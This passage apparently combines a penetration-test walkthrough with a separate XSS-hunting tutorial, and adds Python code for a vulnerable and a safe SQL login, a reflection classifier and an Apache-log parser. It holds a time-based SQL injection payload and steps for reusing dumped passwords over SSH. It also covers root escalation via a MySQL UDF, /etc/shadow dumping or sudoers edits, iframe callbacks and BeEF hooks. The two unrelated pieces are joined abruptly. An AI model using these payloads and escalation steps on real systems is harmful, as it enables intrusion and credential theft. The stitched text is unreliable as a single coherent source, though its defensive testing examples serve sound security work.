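    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO Users (username, password) VALUES (?, ?)",
        [("frodo", "iwilltakethering"), ("smeagol", "MyPreciousR00t")],
    )
    return conn


def login_vulnerable(conn, username: str, password: str):
    """Builds the statement by string concatenation, so a quote in the input
    changes the SQL itself (the flaw sqlmap found on index.php)."""
    sql = (f"SELECT id FROM Users WHERE username='{username}' "
           f"AND password='{password}'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username: str, password: str):
    """Parameterised: the driver sends values separately from the SQL text,
    so the same input is only ever compared as a literal string."""
    row = conn.execute(
        "SELECT id FROM Users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


# The exact username value sqlmap reported as the injection point
TIME_BASED_PROBE = "user' AND (SELECT * FROM (SELECT(SLEEP(5)))wUmu) AND 'mbXF'='mbXF"


def probe_reaches_sql_parser(conn, login_fn) -> bool:
    """True when the probe is parsed as SQL. SQLite has no SLEEP(), so the
    concatenating version raises 'no such function: SLEEP' at prepare time;
    the parameterised version just reports an unknown user."""
    try:
        login_fn(conn, TIME_BASED_PROBE, "pass")
    except sqlite3.OperationalError as exc:
        return "SLEEP" in str(exc)
    return False


if __name__ == "__main__":
    db = make_db()
    print("vulnerable handler parses probe as SQL:", probe_reaches_sql_parser(db, login_vulnerable))
    print("parameterised handler parses probe as SQL:", probe_reaches_sql_parser(db, login_safe))
```

The same probe is a useful regression test for your own login code: run it against every handler that touches the database and fail the build if any of them raises a database error instead of returning "no such user". Storing password hashes rather than clear text, as this application did not, limits what a successful dump is worth.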
SSH LOGIN
Now that we have lots of credentials and clear-text passwords, the next obvious route was to re-try logging in with the accounts over SSH…
Now that we have a full SSH shell to the target, the next route to root is privilege escalation. Since I had the local root password from the SQL DB and a full SSH shell, I decided the quickest way would be to use a user-defined function via the MySQL UDF exploit.
Since the MySQL daemon was running as “root” and our custom function allows us to execute commands, the quickest way to root was to either dump the /etc/shadow file and crack the root password or add the current user to the sudoers file.
In this tutorial, I will cover a simple technique to identify reflected values in a target web application and easily locate Cross-Site Scripting vulnerabilities. By injecting unique heuristic strings, we can quickly check if the value we are testing is reflected and not being sanitized by the application. I have used this technique in the past and it has helped me find various injection bugs that have paid up to $500 in some cases.
Requirements
In order to use this technique, you’ll need Burpsuite along with the custom grep strings and fuzz lists provided in this tutorial to get started. For more advanced tricks covered at the end of this tutorial, you’ll also need Apache and Beef (Browser Exploitation Framework).
Why is this helpful to me?
Using this technique allows you to do the following:
1. Find reflected values quickly (only 3 requests per injection point)
2. Find the location of all reflected values in the response
3. Confirm XSS vectors via heuristic testing
4. Exploit XSS vectors with certainty
Great! How do I do it?
1. Download the Burp attack configuration or manual payload and grep strings here
2. Load the attack configuration or manual payload lists from the Burp Intruder menu
3. Copy/paste the request to the Intruder screen and add injection points:
– Form fields
– GET/POST parameters
– Header fields
– Cookie values
– URI structure
NOTE: You’ll need to copy/paste the hostname into the “Host” tab of the Intruder configuration for this to work.
4. Run the attack and analyze the results. Is "INJECTX" reflected? If so, are HTML special characters such as <>/()"' sanitized? If not, XSS is possible.
5. If HTML special characters are reflected in the response, proceed to XSS exploitation
Workflow:
1. Is the injection point reflected in the response? If yes, goto step 2. As seen below, the “INJECTX” string is found which confirms the payload was reflected.
2. If the payload was reflected in the response, where in the response is it reflected? Search for “INJECTX” to find all injection points. Go to step 3.
3. Once reflected injection points are found, which characters are being sanitized? Again, search for "INJECTX" in the response and look for the heuristic test characters to see which are still untampered. At a minimum, we'll need "'>" and "(INJECTX)" as our grep strings. If these characters or search strings are found, then XSS is possible. Proceed to step 4.
4. If XSS is possible, inject our "real" XSS payloads, either through manual browser attempts, Burp Intruder or Repeater, to exploit the XSS vector. In this case, I'm using an <iframe> that's linked back to my web server.
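Steps 1 to 3 of the workflow are mechanical enough to automate, and the same check doubles as an output-encoding test for your own application. The added example below (not the post's Burp configuration or payload lists, which are a separate download) uses a constructed probe, the INJECTX marker followed by the heuristic characters <>/()"', and classifies each character that comes back after a reflected marker as unescaped, entity-encoded or stripped. The three responses are constructed: a raw echo, one passed through Python's html.escape, and one where a filter removed the dangerous characters.

```python
import html

MARKER = "INJECTX"
PROBE_CHARS = '<>/()"\''          # what a payload needs: tags, attributes, JS calls
PROBE = MARKER + PROBE_CHARS      # constructed probe: INJECTX<>/()"'

# Entity forms an encoder may emit for each probe character
ENTITIES = {
    "<": ("&lt;", "&#60;", "&#x3c;"),
    ">": ("&gt;", "&#62;", "&#x3e;"),
    "/": ("&#47;", "&#x2f;", "&sol;"),
    "(": ("&#40;", "&#x28;"),
    ")": ("&#41;", "&#x29;"),
    '"': ("&quot;", "&#34;", "&#x22;"),
    "'": ("&#39;", "&#x27;", "&apos;"),
}


def classify_tail(tail: str, chars: str = PROBE_CHARS) -> dict:
    """Walk the text that followed a reflected marker and sort each probe
    character into unescaped (came back raw), escaped (entity form) or
    missing (stripped by a filter, or the reflection was truncated)."""
    pos, out = 0, {"unescaped": [], "escaped": [], "missing": []}
    for c in chars:
        if tail.startswith(c, pos):
            out["unescaped"].append(c)
            pos += 1
            continue
        for ent in ENTITIES[c]:
            if tail[pos:pos + len(ent)].lower() == ent:
                out["escaped"].append(c)
                pos += len(ent)
                break
        else:
            out["missing"].append(c)   # no advance: the next char may still follow


    return out


def find_reflections(body: str, marker: str = MARKER) -> list:
    """One record per occurrence of the marker (workflow step 2), with the
    classification of what followed it (workflow step 3)."""
    hits, start = [], 0
    while (i := body.find(marker, start)) >= 0:
        tail = body[i + len(marker): i + len(marker) + 64]
        hits.append({"offset": i, **classify_tail(tail)})
        start = i + len(marker)
    return hits


def xss_likely(body: str) -> bool:
    """Simplified form of the post's rule of thumb: a tag pair or a quote
    character survives unencoded at some reflection point."""
    for hit in find_reflections(body):
        u = hit["unescaped"]
        if ("<" in u and ">" in u) or '"' in u or "'" in u:
            return True
    return False


# Constructed responses to the same probe
UNSAFE_RESPONSE = f"<p>No results for {PROBE}</p>"                         # raw echo
SAFE_RESPONSE = f"<p>No results for {html.escape(PROBE, quote=True)}</p>"   # encoded
STRIPPED_RESPONSE = f"<p>No results for {MARKER}/()</p>"                   # filter removed <>\"'

if __name__ == "__main__":
    for name, body in [("unsafe", UNSAFE_RESPONSE), ("safe", SAFE_RESPONSE), ("stripped", STRIPPED_RESPONSE)]:
        print(name, xss_likely(body), find_reflections(body))
```

The usual caveat from the post's own limitations list applies: this only sees what is in the static HTML, so DOM-based sinks need the page rendered. Note also that "/" , "(" and ")" are left alone by html.escape, which is fine inside an HTML text node but not inside a script block or an event-handler attribute, where context-specific encoding is needed.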
Remote XSS Confirmation
Using a remote payload such as an <iframe> or <img>, you can get remote confirmation via Apache logs, which also helps keep track of blind and stored XSS vectors. The log entry lists the referring page the XSS loaded from along with the source IP, which helps to keep track of which pages and hosts are vulnerable.
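The confirmation trick works because a browser that renders the injected element sends a request to your server with a Referer header naming the page it was rendered on. The following is an added example (not the post's setup) of the bookkeeping that turns those Apache access-log entries into a list of affected pages: it parses the "combined" log format and groups hits on the confirmation page by referrer, recording how many browsers fetched it and from where. The confirmation path and the log lines are constructed; the same grouping is what a defender applies to CSP violation reports.

```python
import re
from collections import defaultdict

# Apache "combined" log format:
# host ident user [time] "method path proto" status bytes "referer" "user-agent"
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)


def parse_combined(line: str):
    """One log line -> dict of fields, or None if it is not combined format."""
    m = COMBINED.match(line)
    return m.groupdict() if m else None


def track_confirmations(log_text: str, confirm_path: str) -> dict:
    """Group hits on the confirmation page by the Referer that loaded it.
    The referer is the vulnerable page; the ip is the browser that rendered
    the payload, so a stored or blind vector shows up here days later."""
    seen = defaultdict(lambda: {"hits": 0, "sources": set()})
    for line in log_text.splitlines():
        rec = parse_combined(line)
        if rec and rec["path"].split("?")[0] == confirm_path and rec["referer"] != "-":
            entry = seen[rec["referer"]]
            entry["hits"] += 1
            entry["sources"].add(rec["ip"])
    return dict(seen)


CONFIRM_PATH = "/xss-confirm.html"   # hypothetical page the injected element points at

# Constructed access log: two pages fire the element, plus unrelated traffic
SAMPLE_LOG = """\
10.0.0.5 - - [15/Jan/2016:23:40:01 +0000] "GET /xss-confirm.html HTTP/1.1" 200 42 "http://app.example.test/search?q=INJECTX" "Mozilla/5.0"
10.0.0.5 - - [15/Jan/2016:23:41:10 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [16/Jan/2016:08:02:33 +0000] "GET /xss-confirm.html HTTP/1.1" 200 42 "http://app.example.test/search?q=INJECTX" "Mozilla/5.0"
10.0.0.9 - - [16/Jan/2016:08:05:00 +0000] "GET /xss-confirm.html?from=guestbook HTTP/1.1" 200 42 "http://app.example.test/guestbook/view.php?id=12" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for referer, info in track_confirmations(SAMPLE_LOG, CONFIRM_PATH).items():
        print(f"{info['hits']:3d} hit(s) from {sorted(info['sources'])} via {referer}")
```

A referrer that keeps appearing from IPs you do not control is the signature of a stored vector being rendered by other users, which is the case worth escalating first.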
Advanced XSS and Client-side Attacks via Beef
Since we control the <iframe> page, we can inject whatever HTML/JS code we want. In this case, it loads a Beef (Browser Exploitation Framework) hook.js which can be used to launch more advanced XSS/client-side attacks.
Drawbacks and limitations:
– XSS vectors must be reflected in the static HTML response
– Does not work with DOM XSS injections unless additional plugins such as BurpKit are used or JS is rendered manually using other techniques
– Does not work great for blind XSS vectors
– Does not take into account XSS bypass methods if input is sanitized